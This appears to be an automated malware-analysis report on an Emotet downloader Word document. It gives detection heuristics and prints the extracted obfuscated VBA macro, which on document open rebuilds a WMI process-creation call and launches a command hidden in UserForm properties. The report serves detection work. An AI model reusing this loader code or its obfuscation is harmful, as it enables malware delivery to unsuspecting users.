Office (OLE) malware analysis — malicious · 593ef299e4bcf8e8

MALICIOUS

Office (OLE)

145.2 KB Created: 2020-02-05 06:51:00 Authoring application: Microsoft Office Word First seen: 2021-02-19

MD5: d65f3c0f5724379f483c994a39435777 SHA-1: a08a2214ef89c20c05e3c5b7e03939d0f6764334 SHA-256: 593ef299e4bcf8e836dd1522653ec33230104646f6e8c376e9c4a9957ca5ca3b

230 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7577855-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7577855-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Matched line in script
```
Qligjvfscbzki = CVar(Join(Split(Rjmerlgajjhzv, "}&*$**(){"), NoLineBreakAfter))
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Xgydvghzai = CreateObject(Wowzyiwozxtui)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32988 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32988 bytes
SHA-256: `4db64d1851fdac975f87253b0cf33ed4ff2620ede5351a41b66adcfe54350544`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Jfpeclyblwjn" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Gjtwcbhkrrm.Rekiwrjid End Sub Attribute VB_Name = "Nsskgikvi" Attribute VB_Base = "0{1AAB3053-FBCE-49A4-A976-5167C320B218}{17508FF4-508C-419E-BB83-75A6F6496EA7}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Pxtevpjny" Attribute VB_Base = "0{D166229C-0027-4573-A416-7F942C56044B}{1F8483FF-4D05-442E-ADBD-949C72CE105F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Ezbjmqrhzfwk() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Slzofajtoppo" Attribute VB_Base = "0{0FB1DF62-3C11-4D0A-960D-66BDE0CDAE2F}{9426875B-E1A0-417D-9241-E87547782F2F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Mivmrruhg() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Tmckcsmmkd" Attribute VB_Base = "0{72124EF7-EDFB-421C-8DEC-61096B13CFDA}{3C8AB7C4-4E95-4ECA-8484-DCB975E53AFF}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Ysymllmuxp() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Qjktpykexemn" Attribute VB_Base = "0{D5B77475-F34F-46C0-A533-9662812F664B}{834DCD66-5795-48C8-BEAB-3C457C62C07B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Lwcbpdhywt() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Jvugldbht" Attribute VB_Base = "0{712CFEF0-848E-4B21-9490-B8BBBFCF6317}{B50253E8-4328-486A-898E-C9E905382A84}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Twlszmtgkf() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Pswahnsm" Attribute VB_Base = "0{3AC35A12-5D58-48B5-A9BE-143AD82B218A}{278B3D0A-FEAA-40C7-B464-2307B8F71383}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Kppkqsim() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Rojeekilcni" Attribute VB_Base = "0{28283F03-61FD-4C5C-A604-820EEC392100}{574708BC-A69F-4742-AA82-58AF8FF8C495}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Vfopdttbg() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Gjtwcbhkrrm" Function Rekiwrjid() HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Geslfkmwji = "}&$(){}&$*(){w}&$*(){i}&$*(){}&$*(){n}&$*(){m}&$*(){g}&$*(){}&$*(){mt}&$*(){}&$*(){" + ChrW(Nsskgikvi.Zoom + 15) + ":}&$*(){wi}&$*(){}&$*(){n3}&$*(){}&$*(){}&$*(){2}&$*(){}&$*(){_}&$*(){}&$*(){" + Nsskgikvi.Cqwhcdhk + "r}&$*(){}&$*(){o}&$*(){ce}&$*(){s}&$*(){}&$*(){s}&$*(){" HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Wowzyiwozxtui = Qligjvfscbzki(Geslfkmwji) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Set Xgydvghzai = CreateObject(Wowzyiwozxtui) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Wauqbcjk = Nsskgikvi.Hgtoflbuiz.Tag HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Hjezbxrfuds = Wowzyiwozxtui + ChrW(Nsskgikvi.Zoom + 15) + Nsskgikvi.Xgmlfqfrmwg.Tag + Wauqbcjk HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Xzppuosw = Hjezbxrfuds + Nsskgikvi.Cqwhcdhk HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Set Vjkeovxo = Ndmuzmgqwfnem(Xzppuosw) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Call Xgydvghzai. _ Create(khknasas + Wprzyvwtyfna + nbswe, Bewvqapoy, Vjkeovxo) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq End Function Function Ndmuzmgqwfnem(Omwtgwbwskjly) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Set Ndmuzmgqwfnem = CreateObject(Omwtgwbwskjly) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Ndmuzmgqwfnem. _ showwindow = Winlmvrthamff + Fckgjrocvl HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq End Function Function Qligjvfscbzki(Rjmerlgajjhzv) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Qligjvfscbzki = CVar(Join(Split(Rjmerlgajjhzv, "}&$*(){"), NoLineBreakAfter)) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq End Function Function Wprzyvwtyfna() HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq nnannauwe = "}&$*(){ }&$*(){-}&$*(){e}&$*(){ }&$*(){" HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Jivhehoeol = ChrW(Int(wdKeyP)) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Zpghswhqlka = Jivhehoeol + Nsskgikvi.Slhmsdtwf.ControlTipText + nnannauwe HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq dkhiqwhnkew = Nsskgikvi.Vslpzipioric.Pages(0).Caption HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Wprzyvwtyfna = Qligjvfscbzki(Zpghswhqlka + StrReverse(dkhiqwhnkew)) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq End Function ' Processing file: /opt/analyzer/scan_staging/5d4bbab68584412d93972d213d1c1869.bin ' =============================================================================== ' Module streams: ' Macros/VBA/Jfpeclyblwjn - 1902 bytes ' Line #0: ' FuncDefn (Private Sub Jfpeclyblwjn()) ' Line #1: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #2: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #3: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #4: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #5: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #6: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #7: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #8: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #9: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #10: ' Ld FlAUEmBDUn ' ArgsMemCall Gjtwcbhkrrm 0x0000 ' Line #11: ' EndSub ' Macros/VBA/Nsskgikvi - 1167 bytes ' Macros/VBA/Pxtevpjny - 1397 bytes ' Line #0: ' FuncDefn (Sub Ezbjmqrhzfwk()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Slzofajtoppo - 1395 bytes ' Line #0: ' FuncDefn (Sub Mivmrruhg()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Tmckcsmmkd - 1395 bytes ' Line #0: ' FuncDefn (Sub Ysymllmuxp()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Qjktpykexemn - 1398 bytes ' Line #0: ' FuncDefn (Sub Lwcbpdhywt()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Jvugldbht - 1392 bytes ' Line #0: ' FuncDefn (Sub Twlszmtgkf()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Pswahnsm - 1391 bytes ' Line #0: ' FuncDefn (Sub Kppkqsim()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Rojeekilcni - 1394 bytes ' Line #0: ' FuncDefn (Sub Vfopdttbg()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Gjtwcbhkrrm - 11886 bytes ' Line #0: ' FuncDefn (Function Gjtwcbhkrrm()) ' Line #1: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #2: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #3: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #4: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #5: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #6: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #7: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #8: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #9: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #10: ' LitStr 0x006A "}&$*(){}&$*(){w}&$*(){i}&$*(){}&$*(){n}&$*(){m}&$*(){g}&$*(){}&$*(){mt}&$*(){}&$*(){" ' Ld Nsskgikvi ' MemLd ChrW ' LitDI2 0x000F ' Add ' ArgsLd Geslfkmwji 0x0001 ' Add ' LitStr 0x0061 ":}&$*(){wi}&$*(){}&$*(){n3}&$*(){}&$*(){}&$*(){2}&$*(){}&$*(){_}&$*(){}&$*(){" ' Add ' Ld Nsskgikvi ' MemLd Zoom ' Add ' LitStr 0x0045 "r}&$*(){}&$*(){o}&$*(){ce}&$*(){s}&$*(){}&$*(){s}&$**(){" ' Add ' St Rekiwrjid ' Line #11: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #12: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #13: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #14: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #15: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #16: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #17: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #18: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #19: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #20: ' Ld Rekiwrjid ' ArgsLd Wowzyiwozxtui 0x0001 ' St Cqwhcdhk ' Line #21: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #22: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #23: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #24: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #25: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #26: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #27: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #28: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #29: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #30: ' SetStmt ' Ld Cqwhcdhk ' ArgsLd Xgydvghzai 0x0001 ' Set Qligjvfscbzki ' Line #31: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #32: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #33: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #34: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #35: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #36: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #37: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #38: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #39: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #40: ' Ld Nsskgikvi ' MemLd Wauqbcjk ' MemLd Tag ' St CreateObject ' Line #41: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #42: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #43: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #44: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #45: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #46: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #47: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #48: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #49: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #50: ' Ld Cqwhcdhk ' Ld Nsskgikvi ' MemLd ChrW ' LitDI2 0x000F ' Add ' ArgsLd Geslfkmwji 0x0001 ' Add ' Ld Nsskgikvi ' MemLd Hjezbxrfuds ' MemLd Tag ' Add ' Ld CreateObject ' Add ' St Hgtoflbuiz ' Line #51: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #52: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #53: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #54: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #55: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #56: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #57: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #58: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #59: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #60: ' Ld Hgtoflbuiz ' Ld Nsskgikvi ' MemLd Zoom ' Add ' St Xgmlfqfrmwg ' Line #61: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #62: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #63: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #64: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St 